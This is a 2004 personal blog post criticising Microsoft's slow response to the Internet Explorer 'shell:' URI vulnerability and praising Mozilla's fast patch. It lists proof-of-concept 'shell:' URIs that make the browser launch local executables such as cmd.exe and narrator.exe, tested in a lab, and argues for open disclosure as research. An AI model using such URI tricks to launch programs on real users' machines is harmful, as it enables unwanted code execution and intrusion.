QODS ec

Saturday, July 10, 2004

SEC: shell: research

shell: research

I think the research over the past couple days proves that M$ just isn't
cutting it these days with their security response to vulnerabilities.
Wasn't it just the other day whn Bill Gates said that they have 1000's of
consultants ready to patch systems and it STILL takes them weeks to patch a simple hole. I understand that M$ has to deal with the underlying OS but
with that many people shouldn't they turn patches out a little faster?
I mean, come on.. I worked with the Mozilla guys and was REALLY impressed
with the turn-around on the patch. It's wasn't real elaborate to correct the issue but it was done in a matter of hours.

The shell: issue is all over Full-disclosure and slashdot but I have yet to see a public response from M$ on the issue.

I hope this helps Mozilla gain some market share because it's where browsing and security models should move in the future in my opinion-

----------end Rant---------------

M$ IE6 shell: vuln tested on fully patched XP SP1 box in VWmare lab

shell:windows\system32\calc.exe
shell:windows\system32\cmd.exe
shell:windows\system32\winver.exe
shell:windows\system32\accwiz.exe

shell:windows\system32\narrator.exe <- This is my favorite one :) This will freak someone out when the PC talks to them.

I guess the good side to this is that IS asks the user to open the file / save is clicked from an anchor but not when using the shell command.
test <- this calls cmd.exe using an anchor tag



I understand the disclosure process but what can you do if they don't respond. This isn't a canned script kiddie exploit it's research. And that should be available to anyone that is interested.

--------------

I got 99 problems but Mozilla isn't one :)

0 Comments:

Post a Comment

<< Home


Get Firefox!